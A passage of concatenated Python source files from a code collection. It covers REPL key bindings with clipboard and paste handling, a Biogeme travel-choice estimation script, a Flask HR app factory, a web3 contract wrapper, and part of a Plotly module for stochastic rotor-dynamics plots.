else:
copy_command = ['pbcopy']
try:
# In Python 3.6 we can do this:
# run(copy_command, input=text, encoding='utf-8', check=True)
subprocess.run(copy_command, input=text.encode('utf-8'), check=True)
except FileNotFoundError:
print("Error: could not find", copy_command[0], file=sys.stderr)
except subprocess.CalledProcessError as e:
print(copy_command[0], "error:", e, file=sys.stderr)
def system_paste():
if "Linux" in platform.platform():
paste_command = ['xsel', '-b']
else:
paste_command = ['pbpaste']
try:
# In Python 3.6 we can do this:
# run(paste_command, input=text, encoding='utf-8')
p = subprocess.run(paste_command, stdout=subprocess.PIPE, check=True)
except FileNotFoundError:
print("Error: could not find", paste_command[0], file=sys.stderr)
except subprocess.CalledProcessError as e:
print(paste_command[0], "error:", e, file=sys.stderr)
return p.stdout.decode('utf-8')
@r.add_binding(Keys.ControlX, Keys.ControlW)
def copy_to_clipboard(event):
if event.current_buffer.document.selection:
from_, to = event.current_buffer.document.selection_range()
run_in_terminal(lambda:system_copy(event.current_buffer.document.text[from_:to + 1]))
@r.add_binding(Keys.ControlX, Keys.ControlY)
def paste_from_clipboard(event):
paste_text_future = run_in_terminal(system_paste)
event.current_buffer.cut_selection()
paste_text_future.add_done_callback(lambda future:\
event.current_buffer.paste_clipboard_data(ClipboardData(future.result())))
# M-[ a b is set to C-S-/ (C-?) in iTerm2 settings
Keys.ControlQuestionmark = "<C-?>"
ALL_KEYS.append("<C-?>")
ANSI_SEQUENCES['\x1b[ab'] = Keys.ControlQuestionmark
Keys.ControlSlash = "<C-/>"
ALL_KEYS.append("<C-/>")
ANSI_SEQUENCES['\x1b"5/'] = Keys.ControlSlash
# This won't work until
# https://github.com/jonathanslenders/python-prompt-toolkit/pull/484 is
# merged.
if prompt_toolkit_version[0] != '3':
@r.add_binding(Keys.ControlQuestionmark, save_before=lambda e: False)
def redo(event):
event.current_buffer.redo()
@r.add_binding(Keys.ControlSlash, save_before=lambda e: False)
def undo(event):
event.current_buffer.undo()
# Need to escape all spaces here because of verbose (x) option below
ps1_prompts = [r'>>>\ '] + [re.escape(i) + r'\[\d+\]:\ ' for i, j in emoji + [emoji_pudb]] + [r'In\ \[\d+\]:\ ']
ps2_prompts = [r'\ *\.\.\.:\ ?', r'\.\.\.\ ?', '\N{CLAPPING HANDS SIGN}+\\ ?⎢\\ ?']
PS1_PROMPTS_RE = re.compile('|'.join(ps1_prompts))
PS2_PROMPTS_RE = re.compile('|'.join(ps2_prompts))
PROMPTED_TEXT_RE = re.compile(r'''(?x) # Multiline and verbose
(?P<prompt>
(?P<ps1prompt>{PS1_PROMPTS_RE.pattern}) # Match prompts at the front
| (?P<ps2prompt>{PS2_PROMPTS_RE.pattern}))? # of the line.
(?P<noprompt>(?(prompt)\r|))? # If the prompt is not
# matched, this is a special
# marker group that will match
# the empty string.
# Otherwise it will not
# match (because all \r's
# have been stripped from
# the string).
(?P<line>.*)\n # The actual line.
'''.format(PS1_PROMPTS_RE=PS1_PROMPTS_RE, PS2_PROMPTS_RE=PS2_PROMPTS_RE))
def prompt_repl(match):
r"""
repl function for re.sub for clearing prompts
Replaces PS1 prompts with \r and removes PS2 prompts.
"""
# TODO: Remove the lines with no prompt
if match.group('ps1prompt') is not None:
return '\r' + match.group('line') + '\n'
elif match.group('ps2prompt') is not None:
return match.group('line') + '\n'
return ''
def split_prompts(text, indent=''):
r"""
Takes text copied from mypython, Python, or IPython session and returns a
list of inputs
Outputs are stripped. If no prompts are found the text is left alone.
The resulting text is indented by indent, except for the first line.
It is assumed that the text contains no carriage returns (\r).
Trailing whitespace and newlines is stripped from the outputs.
Example:
>>> split_prompts('''
... In [1]: a = 1
...
... In [2]: a
... Out[2]: 1
...
... In [3]: def test():
... ...: pass
... ...:
... ''')
['a = 1', 'a', 'def test():\n pass']
"""
from .mypython import validate_text
text = textwrap.dedent(text).strip() + '\n'
text = textwrap.dedent(PROMPTED_TEXT_RE.sub(prompt_repl, text)).lstrip()
lines = text.split('\r')
# Make sure multilines end in two newlines
for i, line in enumerate(lines):
try:
validate_text(line)
except SyntaxError:
# If there is a syntax error, we can't use the CMD_QUEUE (it
# breaks things).
lines = ['\n'.join(lines)]
break
if '\n' in line.rstrip():
lines[i] += '\n'
lines[0] = textwrap.indent(lines[0], indent,
# Don't indent the first line, it's already indented
lambda line, _x=[]: bool(_x or _x.append(1)))
for i in range(1, len(lines)):
lines[i] = textwrap.indent(lines[i], indent)
# Extraneous newlines at the end will be stripped by the prompt anyway.
# This just makes this function easier to test.
lines = [i.rstrip() for i in lines]
return lines
@r.add_binding(Keys.BracketedPaste)
def bracketed_paste(event):
from .mypython import CMD_QUEUE
data = event.data
buffer = event.current_buffer
# Be sure to use \n as line ending.
# This part is the same as the default binding
# Some terminals (Like iTerm2) seem to paste \r\n line endings in a
# bracketed paste. See: https://github.com/ipython/ipython/issues/9737
data = data.replace('\r\n', '\n')
data = data.replace('\r', '\n')
# Replace tabs with four spaces (C-x C-y will still paste the text exactly)
data = data.replace('\t', ' ')
# Strip prompts off pasted text
document = buffer.document
row, col = document.translate_index_to_position(buffer.cursor_position)
row += 1
if not inside_string(event.current_buffer.text, row, col):
indent = LEADING_WHITESPACE.match(document.current_line_before_cursor)
current_line_indent = indent.group(1) if indent else ''
if PS1_PROMPTS_RE.match(data.strip()) or PS2_PROMPTS_RE.match(data.strip()):
lines = split_prompts(data, current_line_indent)
else:
lines = [textwrap.indent(data, current_line_indent,
# Don't indent the first line, it's already indented
lambda line, _x=[]: bool(_x or _x.append(1)))]
else:
lines = [data]
event.current_buffer.insert_text(lines[0])
for text in lines[1:]:
# TODO: Send last chunk as bracketed paste, so it can be edited
CMD_QUEUE.append(text)
if CMD_QUEUE:
accept_line(event)
@r.add_binding(Keys.Escape, ';')
def comment(event):
buffer = event.current_buffer
document = buffer.document
cursor_line, cursor_col = document.translate_index_to_position(document.cursor_position)
if document.selection:
from_, to = document.selection_range()
start_line, start_col = document.translate_index_to_position(from_)
end_line, end_col = document.translate_index_to_position(to - 1)
end_line += 1
else:
start_line = cursor_line
end_line = start_line + 1
# Get the indentation for the comment delimiters
min_indent = float('inf')
for line in document.lines[start_line:end_line]:
if not line.strip():
continue
indent = LEADING_WHITESPACE.search(line)
if indent:
min_indent = min(min_indent, len(indent.group(1)))
else:
min_indent = 0
if min_indent == 0:
break
if min_indent == float('inf'):
min_indent = 0
uncomment = (all(not line.strip() or line[min_indent] == '#' for line in
document.lines[start_line:end_line])
and ''.join(document.lines[start_line:end_line]).strip())
lines = []
for i, line in enumerate(document.lines):
if start_line <= i < end_line:
if uncomment:
lines.append(line[:min_indent] + line[min_indent+2:])
else:
lines.append(line[:min_indent] + '# ' + line[min_indent:])
else:
lines.append(line)
new_text = '\n'.join(lines)
# TODO: Set the cursor position correctly
n_changed = 2*(cursor_line - start_line + 1)
if cursor_line >= end_line - 1:
n_changed -= 2
if uncomment:
buffer.cursor_position -= n_changed
buffer.text = new_text
else:
buffer.text = new_text
buffer.cursor_position += n_changed
@r.add_binding(Keys.ControlX, Keys.ControlE)
def open_in_editor(event):
event.current_buffer.open_in_editor(event.app)
@r.add_binding(Keys.ControlX, Keys.ControlS)
@r.add_binding(Keys.ControlX, Keys.ControlC)
def noop(event):
pass
| 1.804688 | 2 |
demand/preday_model_estimation/isg.py | gusugusu1018/simmobility-prod | 50 | 3466 | from biogeme import *
from headers import *
from loglikelihood import *
from statistics import *
from nested import *
#import random
cons_work= Beta('cons for work', 0,-10,10,0)
cons_edu = Beta('cons for education',0,-50,10,0)
cons_shopping = Beta('cons for shopping',0,-10,10,0)
cons_other = Beta('cons for other',0,-10,10,0)
cons_Q = Beta('cons for quit',0,-10,10,1)
first_stop_inbound= Beta('dummy for first stop of inbound half tour', 0,-10,10,1)
second_stop_inbound= Beta('dummy for second stop of inbound half tour',0,-10,10,0)
threeplus_stop_inbound=Beta('dummy for 3+ stop of inbound half tour',0,-10,10,0)
first_stop_outbound= Beta('dummy for first stop of outbound half tour', 0,-10,10,0)
second_stop_outbound= Beta('dummy for second stop of outbound half tour',0,-10,10,0)
threeplus_stop_outbound=Beta('dummy for 3+ stop of outbound half tour',0,-10,10,0)
work_tour_dummy_Q=Beta('work tour dummy in quit',0,-10,10,1)
edu_tour_dummy_Q=Beta('edu tour dummy in quit',0,-10,10,1)
shopping_tour_dummy_Q=Beta('shopping tour dummy in quit',0,-10,10,1)
other_tour_dummy_Q=Beta('other tour dummy in quit',0,-10,10,1)
first_tour_dummy_Q=Beta('first tour dummy in quit',0,-10,10,0)
sub_tour_dummy_Q=Beta('has subtour dummy in quit',0,-10,10,0)
zero_tour_remain_Q=Beta('zero tour remain dummy',0,-10,10,1)
one_tour_remain_Q=Beta('one tour remain dummy',0,-10,10,0)
twoplus_tour_remain_Q=Beta('2+ tour remain dummy',0,-10,10,1)
work_tour_dummy_W=Beta('work tour dummy in work',0,-10,10,1)
edu_tour_dummy_W=Beta('edu tour dummy in work',0,-10,10,1)
shopping_tour_dummy_W=Beta('shopping tour dummy in work',0,-10,10,1)
other_tour_dummy_W=Beta('other tour dummy in work',0,-10,10,1)
female_dummy_W=Beta('female dummy in work',0,-10,10,0)
student_dummy_W=Beta('student dummy in work',0,-10,10,1)
worker_dummy_W=Beta('worker dummy in work',0,-10,10,1)
driver_dummy_W=Beta('driver dummy in work',0,-10,10,0)
passenger_dummy_W=Beta('passenger dummy in work',0,-10,10,0)
public_dummy_W=Beta('PT dummy in work',0,-10,10,0)
work_tour_dummy_E=Beta('work tour dummy in edu',0,-10,10,1)
edu_tour_dummy_E=Beta('edu tour dummy in edu',0,-10,10,1)
shopping_tour_dummy_E=Beta('shopping tour dummy in edu',0,-10,10,1)
other_tour_dummy_E=Beta('other tour dummy in edu',0,-10,10,1)
female_dummy_E=Beta('female dummy in edu',0,-10,10,0)
student_dummy_E=Beta('student dummy in edu',0,-10,10,1)
worker_dummy_E=Beta('worker dummy in edu',0,-10,10,1)
driver_dummy_E=Beta('driver dummy in edu',0,-10,10,0)
passenger_dummy_E=Beta('passenger dummy in edu',0,-10,10,0)
public_dummy_E=Beta('PT dummy in edu',0,-10,10,0)
work_tour_dummy_S=Beta('work tour dummy in shopping',0,-10,10,1)
edu_tour_dummy_S=Beta('edu tour dummy in shopping',0,-10,10,1)
shopping_tour_dummy_S=Beta('shopping tour dummy in shopping',0,-10,10,1)
other_tour_dummy_S=Beta('other tour dummy in shopping',0,-10,10,0)
female_dummy_S=Beta('female dummy in shopping',0,-10,10,0)
student_dummy_S=Beta('student dummy in shopping',0,-10,10,1)
worker_dummy_S=Beta('worker dummy in shopping',0,-10,10,0)
driver_dummy_S=Beta('driver dummy in shopping',0,-10,10,0)
passenger_dummy_S=Beta('passenger dummy in shopping',0,-10,10,0)
public_dummy_S=Beta('PT dummy in shopping',0,-10,10,0)
work_tour_dummy_O=Beta('work tour dummy in other',0,-10,10,0)
edu_tour_dummy_O=Beta('edu tour dummy in other',0,-10,10,0)
shopping_tour_dummy_O=Beta('shopping tour dummy in other',0,-10,10,0)
other_tour_dummy_O=Beta('other tour dummy in other',0,-10,10,1)
female_dummy_O=Beta('female dummy in other',0,-10,10,0)
student_dummy_O=Beta('student dummy in other',0,-10,10,0)
worker_dummy_O=Beta('worker dummy in other',0,-10,10,0)
driver_dummy_O=Beta('driver dummy in other',0,-10,10,0)
passenger_dummy_O=Beta('passenger dummy in other',0,-10,10,0)
public_dummy_O=Beta('PT dummy in other',0,-10,10,0)
work_logsum=Beta('work logsum in work',0,-10,10,1)
edu_logsum=Beta('edu logsum in edu',0,-10,10,1)
shop_logsum=Beta('shop logsum in shop',0,-10,10,1)
other_logsum=Beta('other logsum in other',0,-10,10,1)
time_window_work=Beta('time available in work',0,-10,10,1)
time_window_edu= Beta('time available in edu',0,-10,10,1)
time_window_shopping= Beta('time available in shopping',0,-10,10,1)
time_window_other= Beta('time available in other',0,-10,10,1)
tour_distance_work= Beta('log tour distance in work',0,-10,10,0)
tour_distance_edu= Beta('log tour distance in edu',0,-10,10,0)
tour_distance_shopping= Beta('log tour distance in shopping',0,-10,10,0)
tour_distance_other=Beta('log tour distance in other',0,-10,10,0)
a700_a930_work= Beta('period 7am to 9:30am in work',0,-10,10,0)
a930_a1200_work=Beta('period 9:30am to 12pm in work',0,-10,10,0)
p300_p530_work=Beta('period 3pm to 5:30pm in work',0,-10,10,0)
p530_p730_work=Beta('period 5:30pm to 7:30 pm in work',0,-10,10,0)
p730_p1000_work=Beta('period 7:30pm to 10pm in work',0,-10,10,0)
p1000_a700_work=Beta('period 10pm to 7am in work',0,-10,10,0)
a700_a930_edu= Beta('period 7am to 9:30am in edu',0,-10,10,0)
a930_a1200_edu=Beta('period 9:30am to 12pm in edu',0,-10,10,0)
p300_p530_edu=Beta('period 3pm to 5:30pm in edu',0,-10,10,0)
p530_p730_edu=Beta('period 5:30pm to 7:30 pm in edu',0,-10,10,0)
p730_p1000_edu=Beta('period 7:30pm to 10pm in edu',0,-10,10,0)
p1000_a700_edu=Beta('period 10pm to 7am in edu',0,-10,10,0)
a700_a930_shopping= Beta('period 7am to 9:30am in shopping',0,-10,10,0)
a930_a1200_shopping=Beta('period 9:30am to 12pm in shopping',0,-10,10,0)
p300_p530_shopping=Beta('period 3pm to 5:30pm in shopping',0,-10,10,0)
p530_p730_shopping=Beta('period 5:30pm to 7:30 pm in shopping',0,-10,10,0)
p730_p1000_shopping=Beta('period 7:30pm to 10pm in shopping',0,-10,10,0)
p1000_a700_shopping=Beta('period 10pm to 7am in shopping',0,-10,10,0)
a700_a930_other= Beta('period 7am to 9:30am in other',0,-10,10,0)
a930_a1200_other=Beta('period 9:30am to 12pm in other',0,-10,10,0)
p300_p530_other=Beta('period 3pm to 5:30pm in other',0,-10,10,0)
p530_p730_other=Beta('period 5:30pm to 7:30 pm in other',0,-10,10,0)
p730_p1000_other=Beta('period 7:30pm to 10pm in other',0,-10,10,0)
p1000_a700_other=Beta('period 10pm to 7am in other',0,-10,10,0)
MU1 = Beta('MU for quit',1,0,100,1)
MU2 = Beta('MU for non-quit', 1.0,0,100,1)
#V for work
V_work= cons_work+\
work_tour_dummy_W*1*(tour_type==1)+\
edu_tour_dummy_W*1*(tour_type==2)+\
shopping_tour_dummy_W*1*(tour_type==3)+\
other_tour_dummy_W*1*(tour_type==4)+\
female_dummy_W*female_dummy+\
student_dummy_W*student_dummy+\
worker_dummy_W*worker_dummy+\
driver_dummy_W*driver_dummy+\
passenger_dummy_W*passenger_dummy+\
public_dummy_W*public_dummy+\
work_logsum * worklogsum+\
time_window_work*time_window_h+\
tour_distance_work*log(1+distance)+\
a700_a930_work*p_700a_930a+\
a930_a1200_work*p_930a_1200a+\
p300_p530_work*p_300p_530p+\
p530_p730_work*p_530p_730p+\
p730_p1000_work*p_730p_1000p+\
p1000_a700_work*p_1000p_700a
#V for education
V_edu = cons_edu+\
work_tour_dummy_E*1*(tour_type==1)+\
edu_tour_dummy_E*1*(tour_type==2)+\
shopping_tour_dummy_E*1*(tour_type==3)+\
other_tour_dummy_E*1*(tour_type==4)+\
female_dummy_E*female_dummy+\
student_dummy_E*student_dummy+\
worker_dummy_E*worker_dummy+\
driver_dummy_E*driver_dummy+\
passenger_dummy_E*passenger_dummy+\
public_dummy_E*public_dummy+\
edu_logsum * edulogsum+\
time_window_edu*time_window_h+\
tour_distance_edu*log(1+distance)+\
a700_a930_edu*p_700a_930a+\
a930_a1200_edu*p_930a_1200a+\
p300_p530_edu*p_300p_530p+\
p530_p730_edu*p_530p_730p+\
p730_p1000_edu*p_730p_1000p+\
p1000_a700_edu*p_1000p_700a
#V for shopping
V_shopping = cons_shopping+\
work_tour_dummy_S*1*(tour_type==1)+\
edu_tour_dummy_S*1*(tour_type==2)+\
shopping_tour_dummy_S*1*(tour_type==3)+\
other_tour_dummy_S*1*(tour_type==4)+\
female_dummy_S*female_dummy+\
student_dummy_S*student_dummy+\
worker_dummy_S*worker_dummy+\
driver_dummy_S*driver_dummy+\
passenger_dummy_S*passenger_dummy+\
public_dummy_S*public_dummy+\
shop_logsum * shoplogsum+\
time_window_shopping*time_window_h+\
tour_distance_shopping*log(1+distance)+\
a700_a930_shopping*p_700a_930a+\
a930_a1200_shopping*p_930a_1200a+\
p300_p530_shopping*p_300p_530p+\
p530_p730_shopping*p_530p_730p+\
p730_p1000_shopping*p_730p_1000p+\
p1000_a700_shopping*p_1000p_700a
#V for other
V_other=cons_other+\
work_tour_dummy_O*1*(tour_type==1)+\
edu_tour_dummy_O*1*(tour_type==2)+\
shopping_tour_dummy_O*1*(tour_type==3)+\
other_tour_dummy_O*1*(tour_type==4)+\
female_dummy_O*female_dummy+\
student_dummy_O*student_dummy+\
worker_dummy_O*worker_dummy+\
driver_dummy_O*driver_dummy+\
passenger_dummy_O*passenger_dummy+\
public_dummy_O*public_dummy+\
other_logsum * otherlogsum+\
time_window_other*time_window_h+\
tour_distance_other*log(1+distance)+\
a700_a930_other*p_700a_930a+\
a930_a1200_other*p_930a_1200a+\
p300_p530_other*p_300p_530p+\
p530_p730_other*p_530p_730p+\
p730_p1000_other*p_730p_1000p+\
p1000_a700_other*p_1000p_700a
#V for quit
V_quit= cons_Q+first_stop_inbound*first_stop*first_bound+\
second_stop_inbound*second_stop*first_bound+\
threeplus_stop_inbound*three_plus_stop*first_bound+\
first_stop_outbound*first_stop*second_bound+\
second_stop_outbound*second_stop*second_bound+\
threeplus_stop_outbound*three_plus_stop*second_bound+\
work_tour_dummy_Q*1*(tour_type==1)+\
edu_tour_dummy_Q*1*(tour_type==2)+\
shopping_tour_dummy_Q*1*(tour_type==3)+\
other_tour_dummy_Q*1*(tour_type==4)+\
first_tour_dummy_Q*first_tour_dummy+\
sub_tour_dummy_Q*has_subtour+zero_tour_remain_Q*1*(tour_remain==0)+\
one_tour_remain_Q*1*(tour_remain==1)+twoplus_tour_remain_Q*1*(tour_remain>=2)
V = {0:V_quit,1: V_work,2:V_edu,3:V_shopping,4:V_other}
av= {0:avail_quit,1:avail_workstop,2:avail_edustop,3:avail_shopstop,4:avail_otherstop}
nest_quit = MU1 , [0]
nest_nonquit = MU2 , [1,2,3,4]
nests=nest_quit,nest_nonquit
prob = nested(V,av,nests,stop_type)
#prob = bioLogit(V,av,stop_type)
rowIterator('obsIter')
BIOGEME_OBJECT.ESTIMATE = Sum(log(prob),'obsIter')
exclude = ((avail_violation==1)+(origin_mtz==0)+(destination_mtz==0)+(time_window_h>=10)) > 0
BIOGEME_OBJECT.EXCLUDE = exclude
nullLoglikelihood(av,'obsIter')
choiceSet = [0,1,2,3,4]
cteLoglikelihood(choiceSet,stop_type,'obsIter')
availabilityStatistics(av,'obsIter')
BIOGEME_OBJECT.PARAMETERS['optimizationAlgorithm'] = "CFSQP"
BIOGEME_OBJECT.PARAMETERS['checkDerivatives'] = "1"
BIOGEME_OBJECT.PARAMETERS['numberOfThreads'] = "6" | 2.171875 | 2 |
HRMS/app/__init__.py | freestyletime/HumanResourceManagement | 1 | 3467 | # 初始化模块
from config import Config
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
# 数据库操作对象
db = SQLAlchemy()
# 创建app
def create_app():
# flask操作对象
app = Flask(__name__)
# 通过配置文件读取并应用配置
app.config.from_object(Config)
# 初始化数据库
db.init_app(app)
# 员工管理子系统
from app.view import employee
# 职位管理子系统
from app.view import post
# 部门管理子系统
from app.view import department
# 工资管理子系统
from app.view import salary
# 考勤管理子系统
from app.view import attendance
# 统一对外接口蓝本
app.register_blueprint(employee)
app.register_blueprint(post)
app.register_blueprint(department)
app.register_blueprint(salary)
app.register_blueprint(attendance)
return app
| 2.703125 | 3 |
listener/src/ethereum_connection.py | NicolasMenendez/oracles-dashboard | 0 | 3468 | <filename>listener/src/ethereum_connection.py<gh_stars>0
import json
import web3
class EthereumConnection():
def __init__(self, url_node):
self._url_node = url_node
self._node_provider = web3.HTTPProvider(self._url_node)
self._w3 = web3.Web3(self._node_provider)
@property
def w3(self):
return self._w3
@property
def url_node(self):
return self._url_node
class ContractConnection():
def __init__(self, eth_conn, contract_address, abi_path):
self._eth_conn = eth_conn
self._contract_address = self._eth_conn.w3.toChecksumAddress(contract_address)
self._abi_path = abi_path
self.__json_abi = self.__open_abi()
self._contract = self._eth_conn.w3.eth.contract(
address=self._contract_address,
abi=self.__json_abi
)
def __open_abi(self):
return json.load(open(self._abi_path, "r"))
@property
def abi(self):
return self.__json_abi
@property
def contract(self):
return self._contract
@property
def address(self):
return self._contract_address
@property
def eth(self):
return self._contract.web3.eth
@property
def w3(self):
return self._eth_conn.w3
| 2.5 | 2 |
ross/stochastic/st_results.py | JuliaMota/ross | 0 | 3469 | <reponame>JuliaMota/ross<filename>ross/stochastic/st_results.py<gh_stars>0
"""STOCHASTIC ROSS plotting module.
This module returns graphs for each type of analyses in st_rotor_assembly.py.
"""
import numpy as np
from plotly import express as px
from plotly import graph_objects as go
from plotly import io as pio
from plotly.subplots import make_subplots
from ross.plotly_theme import tableau_colors
pio.renderers.default = "browser"
# set Plotly palette of colors
colors1 = px.colors.qualitative.Dark24
colors2 = px.colors.qualitative.Light24
class ST_CampbellResults:
"""Store stochastic results and provide plots for Campbell Diagram.
It's possible to visualize multiples harmonics in a single plot to check
other speeds which also excite a specific natural frequency.
Two options for plooting are available: Matplotlib and Bokeh. The user
chooses between them using the attribute plot_type. The default is bokeh
Parameters
----------
speed_range : array
Array with the speed range in rad/s.
wd : array
Array with the damped natural frequencies
log_dec : array
Array with the Logarithmic decrement
Returns
-------
subplots : Plotly graph_objects.make_subplots()
Plotly figure with diagrams for frequency and log dec.
"""
def __init__(self, speed_range, wd, log_dec):
self.speed_range = speed_range
self.wd = wd
self.log_dec = log_dec
def plot_nat_freq(self, percentile=[], conf_interval=[], harmonics=[1], **kwargs):
"""Plot the damped natural frequencies vs frequency.
Parameters
----------
percentile : list, optional
Sequence of percentiles to compute, which must be between
0 and 100 inclusive.
conf_interval : list, optional
Sequence of confidence intervals to compute, which must be between
0 and 100 inclusive.
harmonics: list, optional
List withe the harmonics to be plotted.
The default is to plot 1x.
kwargs : optional
Additional key word arguments can be passed to change the plot
(e.g. line=dict(width=4.0, color="royalblue"), opacity=1.0, ...)
*See Plotly Python Figure Reference for more information.
Returns
-------
fig : Plotly graph_objects.Figure()
The figure object with the plot.
"""
default_values = dict(mode="lines")
conf_interval = np.sort(conf_interval)
percentile = np.sort(percentile)
for k, v in default_values.items():
kwargs.setdefault(k, v)
fig = go.Figure()
x = np.concatenate((self.speed_range, self.speed_range[::-1]))
for j, h in enumerate(harmonics):
fig.add_trace(
go.Scatter(
x=self.speed_range,
y=self.speed_range * h,
opacity=1.0,
name="{}x speed".format(h),
line=dict(width=3, color=colors1[j], dash="dashdot"),
legendgroup="speed{}".format(j),
hovertemplate=("Frequency: %{x:.3f}<br>" + "Frequency: %{y:.3f}"),
**kwargs,
)
)
for j in range(self.wd.shape[0]):
fig.add_trace(
go.Scatter(
x=self.speed_range,
y=np.mean(self.wd[j], axis=1),
opacity=1.0,
name="Mean - Mode {}".format(j + 1),
line=dict(width=3, color=colors1[j]),
legendgroup="mean{}".format(j),
hovertemplate=("Frequency: %{x:.3f}<br>" + "Frequency: %{y:.3f}"),
**kwargs,
)
)
for i, p in enumerate(percentile):
fig.add_trace(
go.Scatter(
x=self.speed_range,
y=np.percentile(self.wd[j], p, axis=1),
opacity=0.6,
line=dict(width=2.5, color=colors2[j]),
name="percentile: {}%".format(p),
legendgroup="percentile{}{}".format(j, i),
hovertemplate=(
"Frequency: %{x:.3f}<br>" + "Frequency: %{y:.3f}"
),
**kwargs,
)
)
for i, p in enumerate(conf_interval):
p1 = np.percentile(self.wd[j], 50 + p / 2, axis=1)
p2 = np.percentile(self.wd[j], 50 - p / 2, axis=1)
fig.add_trace(
go.Scatter(
x=x,
y=np.concatenate((p1, p2[::-1])),
line=dict(width=1, color=colors1[j]),
fill="toself",
fillcolor=colors1[j],
opacity=0.3,
name="confidence interval: {}% - Mode {}".format(p, j + 1),
legendgroup="conf{}{}".format(j, i),
hovertemplate=(
"Frequency: %{x:.3f}<br>" + "Frequency: %{y:.3f}"
),
**kwargs,
)
)
fig.update_xaxes(
title_text="<b>Rotor speed</b>",
title_font=dict(family="Arial", size=20),
tickfont=dict(size=16),
gridcolor="lightgray",
showline=True,
linewidth=2.5,
linecolor="black",
mirror=True,
)
fig.update_yaxes(
title_text="<b>Damped Natural Frequencies</b>",
title_font=dict(family="Arial", size=20),
tickfont=dict(size=16),
gridcolor="lightgray",
showline=True,
linewidth=2.5,
linecolor="black",
mirror=True,
)
fig.update_layout(
width=1200,
height=900,
plot_bgcolor="white",
legend=dict(
font=dict(family="sans-serif", size=14),
bgcolor="white",
bordercolor="black",
borderwidth=2,
),
)
return fig
def plot_log_dec(self, percentile=[], conf_interval=[], harmonics=[1], **kwargs):
"""Plot the log_dec vs frequency.
Parameters
----------
percentile : list, optional
Sequence of percentiles to compute, which must be between
0 and 100 inclusive.
conf_interval : list, optional
Sequence of confidence intervals to compute, which must be
between 0 and 100 inclusive.
harmonics: list, optional
List withe the harmonics to be plotted.
The default is to plot 1x.
kwargs : optional
Additional key word arguments can be passed to change the plot
(e.g. line=dict(width=4.0, color="royalblue"), opacity=1.0, ...)
*See Plotly Python Figure Reference for more information.
Returns
-------
fig : Plotly graph_objects.Figure()
The figure object with the plot.
"""
default_values = dict(mode="lines")
conf_interval = np.sort(conf_interval)
percentile = np.sort(percentile)
for k, v in default_values.items():
kwargs.setdefault(k, v)
fig = go.Figure()
x = np.concatenate((self.speed_range, self.speed_range[::-1]))
for j in range(self.log_dec.shape[0]):
fig.add_trace(
go.Scatter(
x=self.speed_range,
y=np.mean(self.log_dec[j], axis=1),
opacity=1.0,
name="Mean - Mode {}".format(j + 1),
line=dict(width=3, color=colors1[j]),
legendgroup="mean{}".format(j),
hovertemplate=("Frequency: %{x:.3f}<br>" + "Log Dec: %{y:.3f}"),
**kwargs,
)
)
for i, p in enumerate(percentile):
fig.add_trace(
go.Scatter(
x=self.speed_range,
y=np.percentile(self.log_dec[j], p, axis=1),
opacity=0.6,
line=dict(width=2.5, color=colors2[j]),
name="percentile: {}%".format(p),
legendgroup="percentile{}{}".format(j, i),
hoverinfo="none",
**kwargs,
)
)
for i, p in enumerate(conf_interval):
p1 = np.percentile(self.log_dec[j], 50 + p / 2, axis=1)
p2 = np.percentile(self.log_dec[j], 50 - p / 2, axis=1)
fig.add_trace(
go.Scatter(
x=x,
y=np.concatenate((p1, p2[::-1])),
line=dict(width=1, color=colors1[j]),
fill="toself",
fillcolor=colors1[j],
opacity=0.3,
name="confidence interval: {}% - Mode {}".format(p, j + 1),
legendgroup="conf{}{}".format(j, i),
hoverinfo="none",
**kwargs,
)
)
fig.update_xaxes(
title_text="<b>Rotor speed</b>",
title_font=dict(family="Arial", size=20),
tickfont=dict(size=16),
gridcolor="lightgray",
showline=True,
linewidth=2.5,
linecolor="black",
mirror=True,
)
fig.update_yaxes(
title_text="<b>Logarithmic decrement</b>",
title_font=dict(family="Arial", size=20),
tickfont=dict(size=16),
gridcolor="lightgray",
showline=True,
linewidth=2.5,
linecolor="black",
mirror=True,
)
fig.update_layout(
plot_bgcolor="white",
width=1200,
height=900,
legend=dict(
font=dict(family="sans-serif", size=14),
bgcolor="white",
bordercolor="black",
borderwidth=2,
),
)
return fig
def plot(self, percentile=[], conf_interval=[], *args, **kwargs):
"""Plot Campbell Diagram.
This method plots Campbell Diagram.
Parameters
----------
percentile : list, optional
Sequence of percentiles to compute, which must be between
0 and 100 inclusive.
conf_interval : list, optional
Sequence of confidence intervals to compute, which must be between
0 and 100 inclusive.
args: optional
harmonics : list, optional
List with the harmonics to be plotted.
The default is to plot 1x.
kwargs : optional
Additional key word arguments can be passed to change the plot
(e.g. line=dict(width=4.0, color="royalblue"), opacity=1.0, ...)
*See Plotly Python Figure Reference for more information.
Returns
-------
subplots : Plotly graph_objects.make_subplots()
Plotly figure with diagrams for frequency and log dec.
"""
fig0 = self.plot_nat_freq(percentile, conf_interval, *args, **kwargs)
default_values = dict(showlegend=False)
for k, v in default_values.items():
kwargs.setdefault(k, v)
fig1 = self.plot_log_dec(percentile, conf_interval, *args, **kwargs)
subplots = make_subplots(rows=1, cols=2)
for data in fig0["data"]:
subplots.add_trace(data, 1, 1)
for data in fig1["data"]:
subplots.add_trace(data, 1, 2)
subplots.update_xaxes(fig0.layout.xaxis, row=1, col=1)
subplots.update_yaxes(fig1.layout.yaxis, row=1, col=1)
subplots.update_xaxes(fig0.layout.xaxis, row=1, col=2)
subplots.update_yaxes(fig1.layout.yaxis, row=1, col=2)
subplots.update_layout(
plot_bgcolor="white",
width=1800,
height=900,
legend=dict(
font=dict(family="sans-serif", size=14),
bgcolor="white",
bordercolor="black",
borderwidth=2,
),
)
return subplots
class ST_FrequencyResponseResults:
"""Store stochastic results and provide plots for Frequency Response.
Parameters
----------
speed_range : array
Array with the speed range in rad/s.
magnitude : array
Array with the frequencies, magnitude (dB) of the frequency
response for each pair input/output.
phase : array
Array with the frequencies, phase of the frequency
response for each pair input/output.
Returns
-------
subplots : Plotly graph_objects.make_subplots()
Plotly figure with amplitude vs frequency phase angle vs frequency.
"""
def __init__(self, speed_range, magnitude, phase):
self.speed_range = speed_range
self.magnitude = magnitude
self.phase = phase
def plot_magnitude(
self,
percentile=[],
conf_interval=[],
units="mic-pk-pk",
**kwargs,
):
"""Plot amplitude vs frequency.
This method plots the frequency response magnitude given an output and
an input using Plotly.
Parameters
----------
percentile : list, optional
Sequence of percentiles to compute, which must be between
0 and 100 inclusive.
conf_interval : list, optional
Sequence of confidence intervals to compute, which must be between
0% and 100% inclusive.
units : str, optional
Unit system
Default is "mic-pk-pk".
kwargs : optional
